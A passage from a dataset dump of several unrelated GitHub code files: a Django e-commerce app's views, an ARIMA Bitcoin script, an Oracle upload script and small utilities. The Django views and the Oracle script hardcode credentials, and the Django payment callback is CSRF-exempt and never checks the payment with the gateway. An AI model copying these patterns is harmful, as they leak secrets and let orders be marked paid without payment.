Product.objects.filter(category='Cl', selling_price__lt=3000)\n elif data == 'above': \n cloth = Product.objects.filter(category='Cl', selling_price__gte=3000)\n else:\n cloth = Product.objects.filter(category='Cl', brand=data)\n \n paginator = Paginator(cloth, 8)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n # Retrieve unique brand names from the Product model\n brands = Product.objects.filter(category='Cl').values('brand').annotate(num_products=Count('id')).order_by('-num_products')\n\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/cloth.html', {\n 'page_obj': page_obj,\n 'brands': brands,'totalitem':totalitem\n })\n\nclass SearchView(View):\n def get(self, request):\n totalitem=0\n query = request.GET.get('q')\n if not query:\n return render(request, 'app/search.html', {'error': 'No search query specified'})\n\n products = Product.objects.filter(Q(title__icontains=query) | Q(brand__icontains=query) | Q(description__icontains=query))\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n context = {'products': products, 'query': query,'totalitem':totalitem}\n return render(request, 'app/search.html', context)\n#def login(request):\n# return render(request, 'app/login.html')\n\n#def customerregistration(request):\n# return render(request, 'app/customerregistration.html')\nclass CustomerRegistrationView(View):\n def get(self,request):\n form=SignUpForm()\n return render(request,'app/customerregistration.html',{'form':form})\n def post(self,request):\n form=SignUpForm(request.POST)\n if form.is_valid():\n messages.success(request,'Congratulations. your registration complete')\n form.save()\n return render(request,'app/customerregistration.html',{'form':form})\n\n \n@login_required \ndef checkout(request):\n totalitem=0\n user=request.user\n add=Customer.objects.filter(user=user)\n cart_items=Cart.objects.filter(user=user)\n amount=0.0\n shipping_amount=100.0\n total=0.0\n cart_product=[p for p in Cart.objects.all() if p.user ==request.user]\n if cart_product:\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount +=tempamount\n total=amount+shipping_amount\n \n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/checkout.html',{'add':add,'total':total,'cart_items':cart_items,'totalitem':totalitem})\n@login_required\ndef payment_done(request):\n custid = request.POST.get('custid', '')\n try:\n customer = Customer.objects.get(id=custid)\n except Customer.DoesNotExist:\n messages.error(request, 'The selected customer does not exist. Please select a valid customer and try again.')\n return redirect('checkout')\n\n cart = Cart.objects.filter(user=request.user)\n orders = []\n for c in cart:\n order = OrderPlaced(user=request.user,\n customer=customer,\n product=c.product,\n quantity=c.quantity)\n orders.append(order)\n order.save()\n\n cart.delete()\n messages.info(request, '')\n return redirect('orders')\n\n\n\n@method_decorator(login_required,name='dispatch')\nclass profileView(LoginRequiredMixin, View):\n def get(self, request):\n totalitem=0\n user = request.user\n try:\n profile = Customer.objects.get(user=user)\n return redirect('profile-edit')\n except Customer.DoesNotExist:\n pass\n form = CustomerProfileForm()\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/profile.html', {'form': form, 'active': 'btn-primary','totalitem':totalitem})\n\n def post(self, request):\n totalitem=0\n user = request.user\n try:\n profile = Customer.objects.get(user=user)\n return redirect('profile-edit')\n except Customer.DoesNotExist:\n pass\n form = CustomerProfileForm(request.POST)\n if form.is_valid():\n name = form.cleaned_data['name']\n email = form.cleaned_data['email']\n mobile = form.cleaned_data['mobile']\n\n locality = form.cleaned_data['locality']\n city = form.cleaned_data['city']\n state = form.cleaned_data['state']\n zipcode = form.cleaned_data['zipcode']\n reg = Customer(user=user, name=name, email=email,mobile=mobile,locality=locality, city=city, state=state, zipcode=zipcode)\n reg.save()\n messages.info(request, 'Congratulations, your profile has been created!')\n return redirect('profile')\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/profile.html', {'form': form, 'active': 'btn-primary','totalitem':totalitem})\n\nclass ProfileEditView(LoginRequiredMixin, View):\n def get(self, request):\n totalitem=0\n user = request.user\n try:\n profile = Customer.objects.get(user=user)\n form = CustomerProfileForm(instance=profile)\n except Customer.DoesNotExist:\n messages.error(request, 'You need to create a profile before you can edit it.')\n return redirect('profile')\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/profile_edit.html', {'form': form,'active': 'btn-primary','totalitem':totalitem})\n\n def post(self, request):\n totalitem=0\n user = request.user\n try:\n profile = Customer.objects.get(user=user)\n except Customer.DoesNotExist:\n messages.error(request, 'You need to create a profile before you can edit it.')\n return redirect('profile')\n form = CustomerProfileForm(request.POST, instance=profile)\n if form.is_valid():\n form.save()\n messages.info(request, 'Profile has been updated.')\n return redirect('profile')\n else:\n messages.error(request, 'Please correct the errors below.')\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/profile_edit.html', {'form': form,'totalitem':totalitem})\n\n@login_required\ndef payment(request):\n # create a payment request using SSLCommerz\n store_id = 'techh6447fca78b21e'\n API_key = 'techh6447fca78b21e@ssl'\n mypayment = SSLCSession(sslc_is_sandbox=True, sslc_store_id=store_id, sslc_store_pass=API_key)\n status_url = request.build_absolute_uri(reverse('complete'))\n print(status_url)\n mypayment.set_urls(success_url=status_url, fail_url=status_url, cancel_url=status_url, ipn_url=status_url)\n\n # Retrieve customer information from the request's user object\n user = request.user\n user = Customer.objects.get(user=user)\n cart_items = Cart.objects.filter(user=request.user)\n amount=0.0\n shipping_amount=100.0\n total=0.0\n cart_product=[p for p in Cart.objects.all() if p.user ==request.user]\n if cart_product:\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount +=tempamount\n total=amount+shipping_amount\n \n if cart_product == 0:\n shipping_amount = 0\n else:\n shipping_amount = 100\n \n mypayment.set_product_integration(total_amount=Decimal(str(total)), currency='BDT', product_category='clothing', product_name='demo-product', num_of_item=Cart.objects.filter(user=request.user).count(), shipping_method='YES', product_profile='None')\n\n mypayment.set_customer_info(name=user.name, email=user.email, address1=user.locality, address2=user.locality, city=user.city, postcode=user.zipcode, country='Bangladesh', phone=user.mobile)\n\n mypayment.set_shipping_info(shipping_to=user.name, address=user.locality, city=user.city, postcode=user.zipcode, country='Bangladesh')\n\n response_data = mypayment.init_payment()\n \n \n return redirect(response_data['GatewayPageURL'])\n\n\n\n\n@csrf_exempt\ndef complete(request):\n # handle successful payment response from SSLCommerz\n if request.method == 'POST' or request.method == 'post':\n payment_data=request.POST\n status=payment_data['status']\n \n \n if status == 'VALID':\n val_id=payment_data['val_id']\n tran_id=payment_data['tran_id']\n bank_tran_id=payment_data['bank_tran_id']\n card_type=payment_data['card_type']\n \n messages.success(request,f\"your payment completed successfully\")\n return HttpResponseRedirect(reverse('purchase', kwargs={'val_id': val_id, 'tran_id': tran_id}))\n\n\n elif status == 'FAILED':\n messages.warning(request,f\"your payment Failed .please try again\")\n return render(request, 'app/complete.html')\n@login_required\ndef purchase(request, val_id, tran_id):\n cart = Cart.objects.filter(user=request.user, purchased=False)\n orders = []\n for c in cart:\n order = OrderPlaced(\n user=request.user,\n \n product=c.product,\n quantity=c.quantity,\n \n ordered=True,\n payment_Id=val_id,\n order_Id=tran_id,\n status='pending',\n )\n orders.append(order)\n order.save()\n c.purchased = True\n c.save()\n c.delete()\n return HttpResponseRedirect(reverse('home'))\n\n\n\ndef payment_success(request):\n # handle successful payment response from SSLCommerz\n return render(request, 'app/success.html',context=())\n\ndef payment_fail(request):\n # handle failed payment response from SSLCommerz\n return render(request, 'app/fail.html')\n\ndef payment_cancel(request):\n # handle canceled payment response from SSLCommerz\n return render(request, 'app/cancel.html')\n\n\ndef add_review(request, pk):\n products = Product.objects.get(pk=pk)\n if request.method == 'POST':\n form = ReviewForm(request.POST)\n if form.is_valid():\n review = form.save(commit=False)\n review.product = products\n review.user = request.user\n review.save()\n return redirect('product-detail', pk=products.pk)\n else:\n form = ReviewForm()\n return render(request, 'app/add_review.html', {'products': products, 'form': form})\n\n@login_required\ndef wishlist(request):\n totalitem = 0\n user = request.user\n wishlist_products = Wishlist.objects.filter(user=user).exclude(product__cart__user=user)\n \n if request.user.is_authenticated:\n totalitem = len(Cart.objects.filter(user=request.user))\n \n return render(request, 'app/wishlist.html', {'wishlist_products': wishlist_products, 'totalitem': totalitem})\n\n\n@login_required\ndef add_to_wishlist(request, pk):\n totalitem=0\n user = request.user\n \n product = Product.objects.get(pk=pk) # retrieve the Product instance\n \n # Check if the product is already in the user's wishlist\n if user.wishlist.filter(product=product).exists():\n messages.info(request, 'Product is already in your wishlist.')\n else:\n # Add the product to the user's wishlist\n Wishlist.objects.create(user=user, product=product).save()\n messages.success(request, '')\n print(f\"User: {user.username}\")\n print(f\"Product added to wishlist: {product.title}\")\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return redirect('/wishlist', {'totalitem':totalitem})\n\n\n ","repo_name":"Fariha-Alam/E-Commerce-1","sub_path":"djangoapp/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4735996784","text":"import pandas as pd\nimport numpy as np\nfrom statsmodels.tsa.stattools import adfuller\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom sklearn.metrics import mean_squared_error\nimport itertools\n\n# Leer datos\ndata = pd.read_csv('bitcoinprices.csv', parse_dates=['Date'], index_col='Date')\nprices = data['Price'].str.replace(',', '').astype(float)\n\n# Función para calcular el orden óptimo de diferenciación (d)\ndef find_optimal_d(series):\n result = adfuller(series)\n for d in range(1, 4):\n diff = np.diff(series, n=d)\n new_result = adfuller(diff)\n if new_result[1] < 0.05:\n return d\n return 0\n\n# Función para calcular los valores óptimos de p y q\ndef find_optimal_pq(series, p_max, q_max, d):\n best_pq = (0, 0)\n best_mse = float('inf')\n \n for p, q in itertools.product(range(p_max + 1), range(q_max + 1)):\n try:\n model = ARIMA(series, order=(p, d, q))\n results = model.fit()\n mse = mean_squared_error(series[d:], results.fittedvalues[d:])\n if mse < best_mse:\n best_pq = (p, q)\n best_mse = mse\n except:\n continue\n \n return best_pq\n\n# Encontrar valores óptimos de p, d y q\nd = find_optimal_d(prices)\np, q = find_optimal_pq(prices, p_max=5, q_max=5, d=d)\n\nprint(f\"Valores óptimos: p = {p}, d = {d}, q = {q}\")","repo_name":"adrianiux38/bitcoinPredictions","sub_path":"encontrarvalores.py","file_name":"encontrarvalores.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7186750871","text":"import numpy as np\nfrom ForCall01 import *\nfrom branch_code.dadi_loader import *\nimport pandas as pd\nimport time\n\ndef to_oracle():\n path1='outliers/品牌价原厂价价格异常值.csv'\n path2='changfang/4S店价.csv'\n path3='pp_yc/配件品牌价原厂价统计数据及模型预测.csv'\n path4='pp_yc/全国常用配件模型预测.csv'\n\n df1=pd.read_csv(path1)\n df2=pd.read_csv(open(path2,encoding='utf-8'))\n df3=pd.read_csv(open(path3,encoding='utf-8'))\n df4=pd.read_csv(open(path4,encoding='utf-8'))\n\n #配件左右对齐\n path6='data/左右-418-1.csv'\n df6=pd.read_csv(open(path6,encoding='utf-8'))\n df6_map=df6[['ORIGINALCODE_x','ORIGINALCODE_y']]\n df6_map.dropna(subset=['ORIGINALCODE_x','ORIGINALCODE_y'],how='any',axis=0,inplace=True)\n map_dict=dict(zip(df6_map['ORIGINALCODE_x'],df6_map['ORIGINALCODE_y']))\n def map_process(data):\n codes = data['ORIGINALCODE'].tolist()\n counts = data['count'].tolist()\n references = data['参考值'].tolist()\n for code_left in codes:\n if code_left in map_dict.keys():\n code_right=map_dict[code_left]\n if code_right in codes:\n ind_left=codes.index(code_left)\n ind_right=codes.index(code_right)\n count_left=counts[ind_left]\n count_right=counts[ind_right]\n if count_left>=count_right:\n references[ind_right]=references[ind_left]\n else:\n references[ind_left]=references[ind_right]\n return codes,counts,references\n\n fenzu_sta = df3.groupby(['JIGOU','BRAND_ID','CHGCOMPSET'])['ORIGINALCODE','count','REFERENCE'].apply(\n map_process).apply(pd.Series).reset_index()\n fenzu_sta.rename(columns={0:'ORIGINALCODE',1:'count',2:'参考值'},inplace=True)\n\n fenzu_sta1= fenzu_sta.set_index(['JIGOU','BRAND_ID','CHGCOMPSET'])['ORIGINALCODE'].apply(pd.Series).stack().reset_index()\n fenzu_sta1.drop(['level_3'], axis=1, inplace=True)\n fenzu_sta1.rename(columns={0: 'ORIGINALCODE'}, inplace=True)\n\n fenzu_sta2 = fenzu_sta.set_index(['JIGOU','BRAND_ID','CHGCOMPSET'])['count'].apply(pd.Series).stack().reset_index()\n fenzu_sta2.drop(['JIGOU','BRAND_ID','level_3','CHGCOMPSET'],axis=1,inplace=True)\n fenzu_sta2.rename(columns={0: 'count'}, inplace=True)\n\n fenzu_sta3 = fenzu_sta.set_index(['JIGOU','BRAND_ID','CHGCOMPSET'])['参考值'].apply(pd.Series).stack().reset_index()\n fenzu_sta3.drop(['JIGOU','BRAND_ID','level_3','CHGCOMPSET'], axis=1, inplace=True)\n fenzu_sta3.rename(columns={0: '参考值'}, inplace=True)\n fenzu_sta=pd.concat([fenzu_sta1,fenzu_sta2,fenzu_sta3],axis=1)\n\n df3.drop(['参考值'],axis=1,inplace=True)\n df3=pd.merge(df3,fenzu_sta,on=['JIGOU','BRAND_ID','ORIGINALCODE','count','CHGCOMPSET'],how='left')\n df3 = df3.drop_duplicates()\n\n #异常数据传到数据库\n df1.fillna('',inplace=True)\n df1=df1.astype(str)\n oracle = useOracle(\"dd_data2\", \"xdf123\", \"LBORA\")\n table_name1='LB_PEIJIAN_ORIGINAL_ABNORMAL'\n account=\"dd_data2/xdf123@10.9.1.169/lbora\"\n oracle.BatchsysteminsertDataToTable(df1,table_name1,account)\n\n #4S店价数据处理\n list1=['count','mean','median','mode']\n for i in list1:\n df2[i]=''\n df2=pd.DataFrame(df2,columns=['JIGOU','BRAND_ID','BRAND_NAME','COMMON_NAME','COMMON_ID','POS_ID','POS_NAME','ORIGINALCODE','STANDARD_PART_CODE','PRICE_TYPE','count','mean','median','mode','REFERENCE'])\n # ddd=df1.pivot_table(index=['区域','VEHSERINAME_TYPE','IS4S','工时组','项目名称'],columns=['车系档次'])\n\n #4S店价品牌价原厂价数据处理并拼接\n df3.rename(columns={'CHGCOMPSET':'PRICE_TYPE','参考值':'REFERENCE'},inplace=True)\n df3['PRICE_TYPE']=df3['PRICE_TYPE'].map(id2chgompset)\n df3=pd.DataFrame(df3,columns=['JIGOU','BRAND_ID','BRAND_NAME','COMMON_NAME','COMMON_ID','POS_ID','POS_NAME','ORIGINALCODE','STANDARD_PART_CODE','PRICE_TYPE','count','mean','median','mode','REFERENCE'])\n df23=pd.concat([df2,df3],axis=0)\n df23['METHOD']=1\n #模型预测数据处理\n df4.rename(columns={'CHGCOMPSET':'PRICE_TYPE'},inplace=True)\n df4['PRICE_TYPE'] = df4['PRICE_TYPE'].map(id2chgompset)\n list2=['count','mean','median','mode']\n for j in list2:\n df4[j]=''\n df4=pd.DataFrame(df4,columns=['JIGOU','BRAND_ID','BRAND_NAME','COMMON_NAME','COMMON_ID','POS_ID','POS_NAME','ORIGINALCODE','STANDARD_PART_CODE','PRICE_TYPE','count','mean','median','mode','REFERENCE'])\n df4['METHOD']=2\n #数据合并\n df234=pd.concat([df23,df4],axis=0)\n df234.drop_duplicates(subset=['JIGOU','BRAND_NAME','ORIGINALCODE','PRICE_TYPE'],keep='first',inplace=True)\n\n\n\n #配件数据上传到数据库\n now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n df234['INSERT_TIME'] = now_time\n list3 = ['STATUS', 'Update_Person', 'LAST_TIME']\n for k in list3:\n df23[k] = ''\n df234.rename(columns={'mode': 'mode1'}, inplace=True)\n df234['ID'] = [k for k in range(1, len(df234) + 1)]\n df234['JIGOU_ID'] = df234['JIGOU'].map(region2code)\n\n\n\n #从DATA_PART_ALL表中读取数据\n # commit1='''select t.JIGOU_ID,t.BRAND_ID,t.ORIGINALCODE,t.PART_ID from DATA_PART_ALL t '''\n commit1='''select t.JIGOU_ID,t.BRAND_ID,t.ORIGIN_CODE,t.PART_ID from LB_DATA_AUX_1 t '''\n DATA_PART_ALL=oracle.getData(commit1,account)\n DATA_PART_ALL.rename(columns={'ORIGIN_CODE':'ORIGINALCODE'},inplace=True)\n df234 = pd.merge(df234, DATA_PART_ALL, on=['JIGOU_ID', 'BRAND_ID','ORIGINALCODE'], how='left')\n df234['STATUS'] = 1\n\n # num = df234.groupby(['JIGOU_ID', 'BRAND_ID','ORIGINALCODE']).count().reset_index()\n # num['PART_ID'] = [id for id in range(10000000, 10000000 + len(num))]\n # num = pd.DataFrame(num, columns=['JIGOU_ID', 'BRAND_ID', 'ORIGINALCODE', 'PART_ID'])\n #\n # df234 = pd.merge(df234, num, on=['JIGOU_ID', 'BRAND_ID', 'ORIGINALCODE'], how='left')\n df234 = pd.DataFrame(df234,columns=['ID','PART_ID','JIGOU', 'JIGOU_ID', 'BRAND_ID', 'BRAND_NAME', 'COMMON_NAME', 'COMMON_ID',\n 'POS_ID', 'POS_NAME','ORIGINALCODE', 'STANDARD_PART_CODE', 'PRICE_TYPE', 'count', 'mean', 'median', 'mode1',\n 'REFERENCE','METHOD', 'STATUS', 'Update_Person', 'INSERT_TIME', 'LAST_TIME'])\n with open('changfang/peijian2standardcode.json',encoding='utf-8') as f1:\n peijian2standardcode=json.load(f1)\n df234['STANDARD_PART_CODE']=df234['COMMON_NAME'].map(peijian2standardcode)\n df234['STANDARD_PART_CODE'].fillna('999999',inplace=True)\n df234.fillna('',inplace=True)\n df234=df234.astype(str)\n table_name2='LB_PEIJIAN_SYSTEM'\n oracle.BatchpeijianinsertDataToTable(df234,table_name2,account)\n print('LB_PEIJIAN_SYSTEM DONE!')\n\n\n\n\n\n\n\n\n # commit1='''insert into LB_APMS_PARTS(PART_ID,JIGOU,JIGOU_ID,BRAND_ID,BRAND_NAME,COMMON_NAME,COMMON_ID,POS_ID,POS_NAME,ORIGIN_CODE,STANDARD_PART_CODE,\n # FREQUENCY,FACTORY_PRICE,CREATE_WAY,STATUS,INSERT_TIME) select t.PART_ID,t.JIGOU,t.JIGOU_ID,t.BRAND_ID,t.BRAND_NAME,t.COMMON_NAME,\n # t.COMMON_ID,t.POS_ID,t.POS_NAME,t.ORIGINALCODE as ORIGIN_CODE,t.STANDARD_PART_CODE,t.count as FREQUENCY,t.REFERENCE as FACTORY_PRICE,t.METHOD as CREATE_WAY,\n # 1 STATUS,t.INSERT_TIME from PEIJIAN_SYSTEM t where t.PRICE_TYPE = '4S店价' '''\n #\n # commit2='''insert into LB_APMS_PARTS(PART_ID,JIGOU,JIGOU_ID,BRAND_ID,BRAND_NAME,COMMON_NAME,COMMON_ID,POS_ID,POS_NAME,ORIGIN_CODE,STANDARD_PART_CODE,\n # FREQUENCY,ORIGIN_PRICE,CREATE_WAY,STATUS,INSERT_TIME) select t.PART_ID,t.JIGOU,t.JIGOU_ID,t.BRAND_ID,t.BRAND_NAME,t.COMMON_NAME,\n # t.COMMON_ID,t.POS_ID,t.POS_NAME,t.ORIGINALCODE as ORIGIN_CODE,t.STANDARD_PART_CODE,t.count as FREQUENCY,t.REFERENCE as ORIGIN_PRICE,t.METHOD as CREATE_WAY,\n # 1 STATUS,t.INSERT_TIME from PEIJIAN_SYSTEM t where t.PRICE_TYPE = '原厂价' '''\n #\n # commit3='''insert into LB_APMS_PARTS(PART_ID,JIGOU,JIGOU_ID,BRAND_ID,BRAND_NAME,COMMON_NAME,COMMON_ID,POS_ID,POS_NAME,ORIGIN_CODE,STANDARD_PART_CODE,\n # FREQUENCY,BRAND_PRICE,CREATE_WAY,STATUS,INSERT_TIME) select t.PART_ID,t.JIGOU,t.JIGOU_ID,t.BRAND_ID,t.BRAND_NAME,t.COMMON_NAME,\n # t.COMMON_ID,t.POS_ID,t.POS_NAME,t.ORIGINALCODE as ORIGIN_CODE,t.STANDARD_PART_CODE,t.count as FREQUENCY,t.REFERENCE as BRAND_PRICE,t.METHOD as CREATE_WAY,\n # 1 STATUS,t.INSERT_TIME from PEIJIAN_SYSTEM t where t.PRICE_TYPE = '品牌价' '''\n# commit='''insert into LB_APMS_PARTS\n# (PART_ID,\n# JIGOU,\n# JIGOU_ID,\n# BRAND_ID,\n# BRAND_NAME,\n# COMMON_NAME,\n# COMMON_ID,\n# POS_ID,\n# POS_NAME,\n# ORIGIN_CODE,\n# STANDARD_PART_CODE,\n# STATUS,\n# INSERT_TIME,\n# FACTORY_PRICE,\n# ORIGIN_PRICE,\n# BRAND_PRICE,\n# FREQUENCY)\n# select t.*,\n# a.REFERENCE as FACTORY_PRICE,\n# c.REFERENCE as ORIGIN_PRICE,\n# b.REFERENCE as BRAND_PRICE,\n# case\n# when (c.count is null and b.count is null) then\n# 1\n# when (b.count > 0 and c.count is null) then\n# b.count\n# when (c.count > 0 and b.count is null) then\n# c.count\n# when (b.count > 0 and c.count > 0 and b.COUNT >= c.COUNT) then\n# b.COUNT\n# else\n# c.COUNT\n# end FREQUENCY\n# from (select distinct PART_ID,\n# JIGOU,\n# JIGOU_ID,\n# BRAND_ID,\n# BRAND_NAME,\n# COMMON_NAME,\n# COMMON_ID,\n# POS_ID,\n# POS_NAME,\n# ORIGINALCODE as ORIGIN_CODE,\n# STANDARD_PART_CODE,\n# 1 STATUS,\n# INSERT_TIME\n# from PEIJIAN_SYSTEM\n# group by PART_ID,\n# JIGOU,\n# JIGOU_ID,\n# BRAND_ID,\n# BRAND_NAME,\n# COMMON_NAME,\n# COMMON_ID,\n# POS_ID,\n# POS_NAME,\n# ORIGINALCODE,\n# STANDARD_PART_CODE,\n# STATUS,\n# INSERT_TIME) t\n# left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE\n# from PEIJIAN_SYSTEM\n# where PRICE_TYPE = '4S店价'\n# and REFERENCE > 0) a\n# on t.PART_ID = a.PART_ID\n# left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE,COUNT\n# from PEIJIAN_SYSTEM\n# where PRICE_TYPE = '品牌价'\n# and REFERENCE > 0) b\n# on t.PART_ID = b.PART_ID\n# left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE,COUNT\n# from PEIJIAN_SYSTEM\n# where PRICE_TYPE = '原厂价'\n# and REFERENCE > 0) c\n# on t.PART_ID = c.PART_ID\n#\n# '''\n\n # commit = '''insert into LB_APMS_PARTS_LS\n # (PART_ID,\n # JIGOU,\n # JIGOU_ID,\n # BRAND_ID,\n # BRAND_NAME,\n # COMMON_NAME,\n # COMMON_ID,\n # POS_ID,\n # POS_NAME,\n # ORIGIN_CODE,\n # STANDARD_PART_CODE,\n # STATUS,\n # INSERT_TIME,\n # FACTORY_PRICE,\n # ORIGIN_PRICE,\n # BRAND_PRICE,\n # FREQUENCY)\n # select t.*,\n # a.REFERENCE as FACTORY_PRICE,\n # c.REFERENCE as ORIGIN_PRICE,\n # b.REFERENCE as BRAND_PRICE,\n # case\n # when (c.count is null and b.count is null) then\n # 1\n # when (b.count > 0 and c.count is null) then\n # b.count\n # when (c.count > 0 and b.count is null) then\n # c.count\n # when (b.count > 0 and c.count > 0 and b.COUNT >= c.COUNT) then\n # b.COUNT\n # else\n # c.COUNT\n # end FREQUENCY\n # from (select distinct PART_ID,\n # JIGOU,\n # JIGOU_ID,\n # BRAND_ID,\n # BRAND_NAME,\n # COMMON_NAME,\n # COMMON_ID,\n # POS_ID,\n # POS_NAME,\n # ORIGINALCODE as ORIGIN_CODE,\n # STANDARD_PART_CODE,\n # 1 STATUS,\n # INSERT_TIME\n # from LB_PEIJIAN_SYSTEM\n # group by PART_ID,\n # JIGOU,\n # JIGOU_ID,\n # BRAND_ID,\n # BRAND_NAME,\n # COMMON_NAME,\n # COMMON_ID,\n # POS_ID,\n # POS_NAME,\n # ORIGINALCODE,\n # STANDARD_PART_CODE,\n # STATUS,\n # INSERT_TIME) t\n # left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE\n # from LB_PEIJIAN_SYSTEM\n # where PRICE_TYPE = '4S店价'\n # and REFERENCE > 0) a\n # on t.PART_ID = a.PART_ID\n # left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE,COUNT\n # from LB_PEIJIAN_SYSTEM\n # where PRICE_TYPE = '品牌价'\n # and REFERENCE > 0) b\n # on t.PART_ID = b.PART_ID\n # left join (select PART_ID, JIGOU_ID, BRAND_ID, ORIGINALCODE, REFERENCE,COUNT\n # from LB_PEIJIAN_SYSTEM\n # where PRICE_TYPE = '原厂价'\n # and REFERENCE > 0) c\n # on t.PART_ID = c.PART_ID where t.PART_ID is not null\n\n # '''\n # list1=[commit]\n # for comm in list1:\n # oracle.executeCommitSubmit(comm, account)\nif __name__=='__main__':\n to_oracle()\n\n\n\n\n\n\n","repo_name":"loscharld/DADI_PEIJIAN_PRICE","sub_path":"statistics_data_to_oracle.py","file_name":"statistics_data_to_oracle.py","file_ext":"py","file_size_in_byte":14337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33918268099","text":"from invoke import task\n\nfrom ..config import (\n PROJECT_DIRS,\n RESOURCES,\n RESOURCE_DIR,\n)\n\n\n@task\ndef init(cx):\n \"\"\"Initialize the folder structure and other such fixtures.\"\"\"\n\n\n # create the folder structure\n for d in PROJECT_DIRS:\n cx.run(\"mkdir -p {}\".format(d))\n cx.run(\"touch {}/.keep\".format(d))\n\n@task\ndef link_resources(ctx):\n \"\"\"Make links to the project resource folders in this project\"\"\"\n\n for resource in RESOURCES:\n\n command = \"ln -s -r -f -T {res}/{resource} {proj}/{resource}\".format(\n res=RESOURCE_DIR,\n proj=PROJECT_DIR,\n resource=resource)\n\n print(\"Running\")\n print(command)\n print(\"-----------------------------\")\n ctx.run(command)\n\n","repo_name":"salotz/jubeo","sub_path":"modules/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"5867276278","text":"# Week 2 - Tutorial 2: Variables, Types and Formatting\n# Info1110 - Sandeep S\n# 13/05/2018\n# boolean_exp.py is a program which looks at boolean expressions: True/False\n\na = True\nb = False\nx = 50\n\n\n# Should print False\nresult = a and b\nprint(\"a and b = {}\".format(result))\n\n# Should print True\nresult = not(not(a)) or b\nprint(\"not(not(a)) ot b = {}\".format(result))\n\n# Should print True\nresult = a and not b or not a\nprint(\"a and not b or not a = {}\".format(result))\n\n# Should print True\nresult = (b and not(b)) or (a or not(a))\nprint(\"(b and not(b)) or (a or not(a)) = {}\".format(result))\n\n\n","repo_name":"sandeep183/info1110","sub_path":"Tutorials/Week2/boolean_exp.py","file_name":"boolean_exp.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24696681935","text":"import json\n\nimport psycopg2\nfrom django.http import HttpResponse\nfrom DBS2.settings import env\n\n\ndef index(request):\n\n database_connection = psycopg2.connect('host=' + env('DATABASE') + ' port=' + env('DATABASE_PORT') + ' user=' + env(\n 'DATABASE_LOGIN') + ' password=' + env('DATABASE_PW') + ' dbname=' + env('DATABASE_NAME'))\n cursor = database_connection.cursor()\n\n query = \"SELECT VERSION();\"\n cursor.execute(query)\n reply = cursor.fetchall()\n\n query2 = \"SELECT pg_database_size('dota2')/1024/1024 as dota2_db_size;\"\n cursor.execute(query2)\n reply2 = cursor.fetchall()\n\n cursor.close()\n database_connection.close()\n\n response = {\n \"pgsql\": {\n \"version\": reply[0][0],\n \"dota2_db_size\": reply2[0][0]\n\n }\n }\n\n return HttpResponse(json.dumps(response),content_type='application/json')\n\n\n\n","repo_name":"MarosLuk/skuska","sub_path":"DBS2/v1/health.py","file_name":"health.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14097907084","text":"import os\nos.chdir('K:/Learntek/Slides/test')\nfor file1 in os.listdir('.'):\n\tif file1.endswith(\"jpg\"):\n\t\tfile = file1.rsplit(\".\",1)[0]\n\t\tnew_name = file+\".\"+'png'\n\t\tos.rename(file1,new_name)\n\t\t\n\n\n\n","repo_name":"mohitraj/mohitcs","sub_path":"Learntek_code/10_july_18/os1.py","file_name":"os1.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"33628278102","text":"import pytest\n\nfrom . import consts\nfrom . import models\n\nPROCESSING_FLOW_VERSION = 'grocery_flow_v3'\n\n\n@pytest.mark.parametrize(\n 'cancel_order_reason', ['depot_no_product', 'courier_being_late', None],\n)\n@pytest.mark.parametrize(\n 'order_status,response_status,create_event',\n [\n ('closed', 400, False),\n ('canceled', 400, False),\n ('pending_cancel', 400, False),\n ('reserving', 202, True),\n # Forbidden by default, allowed by confing\n ('delivering', 202, True),\n ],\n)\n@pytest.mark.experiments3(\n name='lavka_order_cancel_allowed_statuses',\n consumers=['grocery-orders/submit'],\n match={'predicate': {'type': 'true'}, 'enabled': True},\n clauses=[\n {\n 'title': 'Always enabled',\n 'predicate': {'type': 'true'},\n 'value': {\n 'enabled': True,\n 'statuses': ['created', 'assembling', 'assembled'],\n },\n },\n ],\n default_value={},\n is_config=True,\n)\n@pytest.mark.now(consts.NOW)\nasync def test_basic(\n 